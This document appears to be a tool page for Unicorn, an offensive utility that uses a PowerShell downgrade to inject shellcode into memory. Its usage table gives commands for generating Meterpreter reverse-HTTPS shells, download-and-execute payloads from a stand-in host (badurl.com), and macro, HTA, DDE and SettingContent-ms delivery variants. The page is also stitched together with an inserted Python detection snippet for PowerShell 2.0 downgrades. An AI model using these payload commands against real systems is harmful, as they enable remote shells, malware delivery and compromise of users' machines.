Unicorn
Description
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
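A defender-side check for the engine-version form of a PowerShell downgrade, added here as an example (it is not part of the original page or of Unicorn's code): it flags process command lines that request the 2.0 engine and Windows PowerShell event ID 400 records whose EngineVersion is 2.x. The function names and sample records are constructed for illustration, and nothing here assumes the exact command Unicorn emits.

```python
import re

# powershell.exe accepts any unambiguous prefix of a parameter name and both
# '-' and '/' as the switch character, so -Version may appear as -v ... -version.
_PREFIXES = "|".join("version"[:n] for n in range(7, 0, -1))
DOWNGRADE_ARG = re.compile(
    r"(?:^|\s)[-/](?:" + _PREFIXES + r")\s+[\"']?2(?:\.0)?[\"']?(?=\s|$)",
    re.IGNORECASE,
)
POWERSHELL_IMAGE = re.compile(
    r"(?:^|[\\/\"\s])powershell(?:\.exe)?(?=[\"\s]|$)", re.IGNORECASE
)
ENGINE_FIELD = re.compile(r"\bEngineVersion=(\d+)\.")


def cmdline_requests_v2(cmdline):
    """Heuristic: a PowerShell process asked to start with the 2.0 engine."""
    return bool(POWERSHELL_IMAGE.search(cmdline) and DOWNGRADE_ARG.search(cmdline))


def engine_started_as_v2(event_id, message):
    """Event 400 (engine started) in the 'Windows PowerShell' log, engine 2.x."""
    m = ENGINE_FIELD.search(message)
    return event_id == 400 and m is not None and m.group(1) == "2"


# Constructed sample data, not taken from the page or from a real host.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 2 -NoProfile',
    "powershell /ve 2.0 -c whoami",
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    "cmd.exe /c ver",
    "powershell.exe -Version 5.1 -c hostname",
]
SAMPLE_EVENTS = [
    (400, "Engine state is changed from None to Available. HostVersion=2.0 EngineVersion=2.0"),
    (400, "Engine state is changed from None to Available. EngineVersion=5.1.19041.1"),
    (403, "Engine state is changed from Available to Stopped. EngineVersion=2.0"),
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(cmdline_requests_v2(cmd), cmd)
    for event_id, message in SAMPLE_EVENTS:
        print(engine_started_as_v2(event_id, message), event_id)
```

The command-line match is a heuristic (a script's own `-v 2` argument also matches); the EngineVersion field of event 400 records which engine actually started.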
Installation
$ git clone https://github.com/trustedsec/unicorn.git
Usage
Run Magic Unicorn (if you use the Metasploit methods, make sure Metasploit is installed and in the right path). It automatically generates a PowerShell command, which you cut and paste into a command-line window or deliver through a payload delivery system. Unicorn supports your own shellcode, Cobalt Strike, and Metasploit.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
Example | Syntax |
---|---|
PS Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 |
PS Down/Exec | python unicorn.py windows/download_exec url=http://badurl.com/payload.exe |
PS Down/Exec Macro | python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro |
Macro Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro |
Macro Example CS | python unicorn.py <cobalt_strike_file.cs> cs macro |
HTA Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta |
HTA SettingContent-ms Metasploit | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms |
HTA Example CS | python unicorn.py <cobalt_strike_file.cs> cs hta |
HTA Example SettingContent-ms | python unicorn.py <cobalt_strike_file.cs> cs ms |
HTA Example SettingContent-ms | python unicorn.py <path_to_shellcode.txt>: shellcode ms |
DDE Example | python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde |
CRT Example | python unicorn.py <path_to_payload/exe_encode> crt |
Custom PS1 Example | python unicorn.py <path to ps1 file> |
Custom PS1 Example | python unicorn.py <path to ps1 file> macro 500 |
Cobalt Strike Example | python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format) |
Custom Shellcode | python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00 or metasploit) |
Custom Shellcode HTA | python unicorn.py <path_to_shellcode.txt> shellcode hta (formatted 0x00 or metasploit) |
Custom Shellcode Macro | python unicorn.py <path_to_shellcode.txt> shellcode macro (formatted 0x00 or metasploit) |
Generate .SettingContent-ms | python unicorn.py ms |